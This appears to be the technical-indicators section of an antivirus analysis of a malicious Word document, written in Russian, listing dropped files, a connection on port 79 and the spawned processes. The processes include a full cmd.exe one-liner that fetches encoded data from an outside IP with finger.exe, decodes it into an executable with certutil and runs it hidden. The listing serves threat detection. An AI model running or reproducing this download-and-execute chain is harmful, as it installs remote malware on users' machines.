Техническая информация
- %APPDATA%\lxhzqrz1
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- '18#.#64.146.102':79
- '<SYSTEM32>\cmd.exe' /C finger nc20@184.164.146.102 > %appdata%\lxhZQrz >> %appdata%\lxhZQrz1 && certutil -decode %appdata%\lxhZQrz1 %appdata%\lxhZQrz.exe &&cmd /C del %appdata%\lxhZQrz1 && %appdata%\lxhZQrz.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C finger nc20@184.164.146.102 > %appdata%\lxhZQrz >> %appdata%\lxhZQrz1 && certutil -decode %appdata%\lxhZQrz1 %appdata%\lxhZQrz.exe &&cmd /C del %appdata%\lxhZQrz1 && %appdata%\lxhZQrz.exe
- '<SYSTEM32>\finger.exe' nc20@184.164.146.102
- '<SYSTEM32>\certutil.exe' -decode %APPDATA%\lxhZQrz1 %APPDATA%\lxhZQrz.exe